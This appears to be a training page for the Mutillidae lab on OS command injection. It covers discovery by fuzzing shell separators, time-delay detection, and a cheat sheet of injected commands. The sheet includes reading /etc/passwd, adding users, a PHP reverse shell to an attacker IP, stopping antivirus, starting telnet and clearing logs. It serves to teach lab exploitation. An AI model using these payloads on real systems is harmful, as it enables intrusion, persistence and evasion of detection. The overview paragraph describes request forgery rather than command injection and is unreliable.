Command Injection (CMDi) |
Overview Command Injection may occcur when an attacker is able to run script into a users browser. To forge a legitimate request, the script creates and send the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the users browser but cannot detect that the request was created and sent by a malicious script running in the users browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way. Discovery Methodology Look for pages that appear to execute system commands like ping, nslookup, traceroute or CGI scripts Attempt to identify the operating system. For example HTTP Response vanity headers like x-powered-by, Server, x-aspnet-version, etc. may infer operating system. Also look for clues such as ASP.NET runs on Windows exclusively and IIS version is tied directly to operating system version. Try to cause an error since error messages often contain hints about the underlying operating system such as the direction of the file path separators. Fuzz with command separators like ;, & and && depending on if you are using Linux or Windows respectively. Fuzz with characters reserved in operating system shells /bin/bash: ! # $ % & ' ( ) * + , - . / : ; < = > ? @ [ \ ] ^ _ { | } ~ cmd.exe: % ^ & < > | ' ` , ; = ( ) ! ” [ ] . * ? Also fuzz with non-alphanumeric ASCII characters and command injection values from Fuzz DB Some vulnerable pages may not produce explicit output. Two methods may help detect command injection vulnerabilities in these cases may be missing output or time-delay inference When fuzzing for command injection note when pages are missing output. In some cases an error caused by fuzzing for command injection may interupt the normal flow of execution.
Time-delay inference should be attempted with commands most users are allowed to execute that cause a predictable delay. ping may work well due to running in one second increments and being executable by users on Windows and Linux against the loopback interface Windows: ping -n 15 127.0.0.1 Linux: ping -i 15 -c 2 127.0.0.1 Try prefixing and suffixing the injection with chaining characters ||, |, &&, &, `, <CRLF>, <LF> Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment. Attempt to determine the operating system type. Reserved characters used in fuzzing for command injection &: Used to separate multiple commands on one command line. Runs the first command then the second command. &&: Used to run the command following && only if the preceding command is successful. || (Windows): Used to run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully. || (Linux): Redirects standard output of the first command to standard input of the second command. ( ): Use to nest commands. #: Command line comment symbol Exploitation Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt since most user accounts will have permission to execute directory listings by default and these two commands tend to be exclusive (Windows will not typically execute "ls" and Linux will typically not execute "dir" but this behavior absolutely varies) Prefix the injections with each of the reserved characters then for each prefix suffix each injection as well. Examples Examples for page "dns-lookup.php" Recon: Discover available functionality using provided help Windows XP: && help Linux: && <cmd> --help Linux: && man <cmd> Recon: Determine current directory Windows XP: && dir Linux: && pwd Recon: Chain commands to discover driectory structure Windows XP: && cd ../../.. && dir Linux: && cd ../../.. && ls -l Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc. Windows XP: && ipconfig /all Linux: && ifconfig Scanning: Discover hosts on network Windows XP: && ping -n 1 192.168.56.102 Linux: && ping -c 1 192.168.56.102 Scanning: Enumerate Current user Windows XP: && set Linux: && whoami Scanning: Enumerate users Linux: & cat /etc/passwd Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups Windows XP: && net view [/domain] Windows XP: && net user [/domain] Windows XP: && net localgroup [/domain] Gaining Access: Add user Windows XP: && net user <username> /add Linux: useradd <username> Gaining Access: Delete user Windows XP: && net user <username> /delete Gaining Access: Reverse Bash Shell Linux: Determine the IP address of the attacking host. Set up listener on attacker host such as nc -l -p 1234. Once listener set-up, ask web application server to connect back to attacker host. Set IP address appropriately. www.google.com;php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");' Maintain Access: kill AV net stop <av process> Maintain Access: Kill AV/protective services or open backdoor services Windows XP: && net stop <service name> Windows XP: && net start telnet Windows XP: && net stop telnet Cover Tracks: Clear logs Windows XP: && wevtutil cl Videos Click here to watch Command Injection Explained - Part 1: The Basics Click here to watch Command Injection Explained - Part 2: Discovery Click here to watch Command Injection Explained - Part 3: Blind Injection Click here to watch Command Injection Explained - Part 4: Chaining Commands Click here to watch Command Injection Explained - Part 5: Shell Click here to watch Command Injection Explained - Part 6: Directory Traversal Click here to watch Command Injection to Dump Files, Start Services, and Disable Firewall Click here to watch How to Locate the Easter egg File using Command Injection Click here to watch Gaining Administrative Shell Access via Command Injection Click here to watch Using Command Injection to Gain Remote Desktop Click here to watch Solving Password Challenge in Mutillidae with Command Injection |